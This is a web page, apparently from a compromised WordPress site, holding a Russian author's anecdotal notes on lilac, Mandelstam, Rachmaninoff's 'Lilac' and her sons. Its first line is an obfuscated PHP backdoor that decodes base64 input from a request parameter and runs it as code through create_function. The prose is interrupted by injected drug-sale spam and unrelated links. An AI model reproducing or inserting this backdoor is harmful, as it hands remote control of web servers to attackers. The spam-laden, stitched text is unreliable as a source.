nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

ГЛУБОКИЙ ОБМОРОК СИРЕНИ


http://soligenix.com/images/bg_header_home.jpg                
                                      ( о б е щ а н н ы е      п р и м е ч а н и я )
  эпиграф

Buy Phentermine Using Paypal

"Художник  нам  изобразил
глубокий  обморок  сирени"
…………………………………………..
……… ….   ….   ..   О.  МАНДЕЛЬШТАМ  (1932г.)

http://letterforma.com/household-budget/household-budget-householdbudget-jpg/

Buy Zopiclone Next Day Delivery Uk                  
1) ПРИМЕЧАНИЕ к  моему рассказу "Сиреневый  Гоголь  и  скверный  квадрат",
 вкупе  с  предыдущим  рассказом  "Франсуаза  без  экстаза" ,
где  было  вскользь  сказано, что мой  муж-искусствовед …  д а л ь т о н и к .
 (!)   ОДНАКО  Ж !    ИЗОБРЕЛИ  год-два  назад  ДЛЯ  ДАЛЬТОНИКОВ  СПЕЦИАЛЬНЫЕ   ОЧКИ  С    С И Р Е Н Е В Ы М И    ЛИНЗАМИ.
 Примерная  стоимость  (на  2014г) 190 фунтов  стерлингов.

2) ПРИМЕЧАНИЕ к  открытию  с и р е н е в о г о   красителя  ш е с т н а д ц а т и л е т н и м   Перкином  (патент  он получил  в 18 лет).
  Открытие  сделано,  как  и  многие   другие  в  истории, случайно,  в  результате  метода  "тыка"  и  ошибок  в  опытах !

3) ПРИМЕЧАНИЕ  к  "к о п е е ч к е  юродивого".

http://mwbuzz.com/index.php/tag/wizard/           Из  рабочих  сцены   Александринского  театра  я,  проработав  там   с е з о н,  ушла  работать  в  Мариинский  (б.Кировский) театр  бутафором  –  чтоб  балеты  бесплатно  смотреть  (и  волей-неволей ненавистную оперу  отслушивать) . . . и  чтоб  было  достаточно  свободного  времени  с Гариком -Егорушкой  ( будущим  о.Георгием) по  его сомнительным  компаниям  шататься.
        Э т о т , не  красящий  меня  факт, а  также  то,  что  я  не  комсомолка, не  помешали  мне  стать  многим  на  зависть  в  прославленном   театре   в ы е з д н о й  ! Сначала  меня  с  оперой  в  1973 "в ы п у с т и л и"  в  Г Д Р,  а  на  следующий год  – в  Швецию, в  Стокгольм. При  этом  сказали, что  я  уже  в  списках  на  Японию  с балетом. . .  но  это  отдельная  история.
               Мой   дорогой  муж  Гарик,  как   его   звала  мать  и  родственники,  он  же  Егорушка, как  его  приняли  в  Русском  музее, услышав,  что  меня   в ы п у с т и л и  на  гастроли  в   Германию,  скептически  сказал:
     —  У   н а с   сумасшедших  только   в п у с к а ю т   и   никого   н е    в ы п у с к а ю т  !
             Но  был,  как  и  все  вокруг –   от  соседей  до,  повторяю, коллег – обескуражен, что  действительно, в  эти  суровые  времена  " железного  занавеса "  меня  легко  "в ы п у с т и л и "…
           Это была  вообще  первая  гастроль в   истории  Мариинского   театра,  когда  оперная  труппа  выехала  всем  " т а б о р о м ",  а  не  просто  солисты  поодиночке.
 
     В  стокгольмской  газетной  рецензии  на  нашего  "Бориса  Годунова"   был  такой  нюанс:   ПАРТИЮ   И Д И ОТА   исполнил  такой-то.
     Все  "наши"  рассказывали  друг  другу  эту  газетную  сенсацию  и , хохоча,  поднимали  себе   настроение.

4) ПРИМЕЧАНИЕ  к  романсу  Рахманинова  "С и р е н ь ".

http://allovermedia.com/category/out-of-home-advertising/page/3/         Наш  младший  сын  "безмятежно  расцветал",  но  не   "в  садах  лицея ", а  в  дикой  деревне  на  дикой  природе.  До  школы  все  гурьбой  ходили  –  и  малые,  и  старшие –  на  дискотеки  в  другие  деревни. Бродили  туда-сюда  по  ночам  и  без  луны,  и  при  любой  погоде. Бывало,  и  в  одиночку. А  в  наших  лесах водятся  и  волки,  и  медведи, и  кабаны … Я  была   впечатлена   взрослой  интонацией  сына  в  ответ  на  мою   реплику: " Ты  уж, когда  идёшь  по  лесу  в  темноте,  хоть  своему  ангелу-хранителю  молись…"  Пяти-шестилетний  малыш, по-взрослому  горестно  вздохнув,  ответил: " Мама,  а   ч т о    е щ ё   остаётся   делать ?.." Потом,  в  школе, начались  ночные  гонки  на  мотоциклах  по  бездорожью  до  четырёх-пяти  утра. Я  осторожно однажды  спросила: " А  как  вы  ориентируетесь, гоняя  как  сатаны по лесам, по  ночам , без  луны  –  среди  деревьев ? "  Сын, сосредоточенно  ковыряясь  в  моторе  мотоцикла, перешедшего  к  нему  от  повзрослевшего  старшего  брата,  мне  ответил: " … ориентируемся… а  по  верхушкам деревьев …"   Вот  так.   Так  вот.
          Понимая,  что  ни  в  жисть  мне  не  заняться  с  младшеньким  никакой  " музыкальной  азбукой ",  я  решила  выучить  с  ним  оригинальный  репертуар  для  неизбежных  школьных   праздников  –  благо  началась   "перестройка "  и  идеологической  тематикой  можно  было  пренебречь. У  нас  дома  был  настольный  синтезатор  и  небольшая  стопка  случайных  нот,  из  которых  подходящими  оказались  " Средь  шумного  бала "  Чайковского   и   " С и р е н ь "   Рахманинова.
          Как  ни  странно,  младшенький  без  уговоров  " повёлся "  на  оба  эти  романса.  Я   поражалась:  он   пролетает  мимо  дома,  я  выскакиваю  и  кричу  ему  в    рупор  ладошек: " Ре-е-пе-е- ти-и-ровать !  " – и  он   вдруг  "нарисовывается"  передо  мной  с  готовностью  повторять  и  повторять  одно  и  то  же.  Причём   сразу  ухватив  принцип  исполнения, ни  разу  не  путаясь  в  трудном  вступлении  в  " Сирени " !  А  в  " Средь  шумного  бала "  старательно,  вслед  за  Собиновым  на  пластинке,  которую  я  ему  крутила,  сын  пел: "…срЭдь  шумного  бала… мне  стан  твой  понравился  тонкЫй. . . а  смех  твой  и  грустный,  и  звонкЫй  с  тех  пор  в   моём  сЭрдцЭ  звучит "…  Так  он   по-старинному   и  пел  на  всяких  деревенских  концертишках.
      Но  вот  пришло  время  более  серьёзного  испытания  –  спеть  в  городском  Доме  культуры  в  паузах  между  показом  фестивальных  школьных  и  колледжных  программ. Там  уже была настоящая  сцена,  с настоящим  раздвижным,  волокущимся  по  настилу  занавесом,  с  рояльчиком  посреди  сцены,  который  был  даже  настроен  для  только  что  гастролировшей  Валентины  Толкуновой.
            Поскольку  у  меня  синдром  страха  сцены, то,  когда   парень,  ответственный  за  работу  занавеса,  меня  неосторожно  спросил,  буду  ли   я  аккомпанировать на  рояле посреди  сцены ПРИ  ЗАКРЫТОМ  ЗАНАВЕСЕ,  я  с  радостью  ухватилась  за  его  некомпетентность  и  сказала: " О,  конечно,  так  будет  замечательно –  всё  внимание  должно  быть на  солиста, поющего   п е р е д  занавесом ! "
               Ну  и  началось  такое  новшество  в  исполнительском  искусстве.
             " Средь  шумного  бала "  прошло  нормально , я  играла  и  "не  дёргалась". А  вот  на  " Сирени " …  О,  если  бы  " нормально " !  Сейчас,  когда  выросший  младшенький  прочитал  это,  он  сделал  несколько  добавлений   в  мой  рассказ  " матушки – гусыни ". Оказывается, уже  в  только  начавшемся  вступлении  к  ромасу  Чайковского  сидевшая  в  зале  молодёжь  вынула  свои  зажигалки  и  стала  ими  приветственно  размахивать.  Мало  того,  позади  моего  певца   был  закрытый  занавес, на  который  он  наступил   пятками,  а  впереди  стоял  ненужный  ему  микрофон  на  стойке  с  тянущимся  у  ног  проводом. Всё  это  с  самого  начала  юного  исполнителя  разозлило.  И   когда   первый   романс  был,  как   положено,  отмечен   апплодисментами,  кто-то   из   взрослых   наконец   дошёл   до   рубильника   и   дёрнул  его.
            Занавес  стал   лениво  раскрываться  синхронно  с  переливчатым,  словно  птичье  треньканье,  вступлением  к  " Сирени ".  Нежно  и   ласково   занавес  подхватил  солиста,  который,  поскольку  человек  в  некотором  смысле  от  обезьяны  произошёл,  рефлекторно   ухватился  за   стойку  вдруг  пригодившегося  микрофона.
             А  поскольку  ноты  на  пюпитре  рояля   располагаются  на  полметра  выше,  чем   на   столе  с  синтезатором, я  всем  существом  вцепилась  в  нотный  текст, словно  альпинист  в  скалу: только   бы … только   бы,  да   как   бы  не  сбиться   со   счёта,  чтоб   не  сбить   ребёнка.
           Вероятно,  я  и  ощутила   какую-то   нездоровую   вибрацию   ползущего  занавеса   и   глухого   смеха   зала,  но  замысленная   Рахманиновым  монотонная  вибрациозность  в  аккомпанименте  слилась  с  сейсмической  обстановкой  авнсцены  и  сдавленного   восторга   зала.
       Закручиваемый  в  громадный  по  сравнению с  ним  занавес  с   микрофонным  комплексом  в  руках,  ребёнок  невозмутимо  и   с  " оттенками "  пел  себе   и  пел , вдохновляемый   горячим  дыханием  зала   и  своей  собственной  оппозиционностью  к  этому,  чересчур   горячему,   дыханию .
           Так  же  невозмутимо  и  не  переставая  петь,  он   высвободился  из  коварной  тряпки  занавеса,  выкрутился  из   проводов  микрофона  и  окончил  выступление  под   у д и в и в ш и й    меня   грохот  чрезмерных  аплодисментов.  Как  ни  в  чём  не  бывало  сын  кланялся  бушующей  публике,  стоя   рядом  со  мной.
         Молодец  –  ничего  не  скажешь !
         Только   лишь   в    д а н н ы й   момент  меня  удивило  и  другое:  почему  я,  кланяясь,  н е   удивилась, что   занавеса   н е т   ? ? ?

http://chelseafc360.com/wp-login.php?action=lostpassword       Но  надо  для  равновесия  воздать  меморию  и  старшенькому.
      Когда  ему  было  полтора   года,  к  этому  времени  папа  выштудировал  с  ним  весь  русский  алфавит.
      Как-то  ребёнок  никак  не  мог  уснуть,  и  я,  баюкала  его,  исчерпав  весь  свой  репертуар,  подходящий  для  этого  случая.  Подойдя  к  окну, где  серп  луны  довлел  над  уличным  освещением,  я  решила  с  ребёнком  провести  астрономический  ликбез.
      Сюсюкая,  я  объясняла,  что  можно  мысленно  приставить  к  серпику  палочку  и  будет  буква  " Р ",  с  которого  начинается  слово  р-р-р-астущая  из  серпика  луна,  если  только  он,  ребёнок, закроет  глазки.  А  если   н е    присталять  палочку,  то  серпик  похож  на  бкукву " С " ,  то  есть   надо  с  ним  вместе    с-с-с-патеньки . . .  Повторив  несколько  раз  урок,  я  решила   ребёнка   проэкзаменовать: " Ну, попробуй,  приставь  палочку  к  серпику,  какая  буковка  получится ? Или  серпик  вместе  с  тобой  будет  с-с-с-патеньки ?  Ну,  ну,  какую  мы  буковку  видим  на  небе ? "
       Ребёнок  подумал-подумал  и  изрёк:
   —  Буква  " Ы "  !  У  него  задействованными  оказались  все  возможные " палочки " . . .Это  ж   додуматься !  Или  я  плохо  разъясняла ?


Добавить комментарий

Для отправки комментария вам необходимо авторизоваться.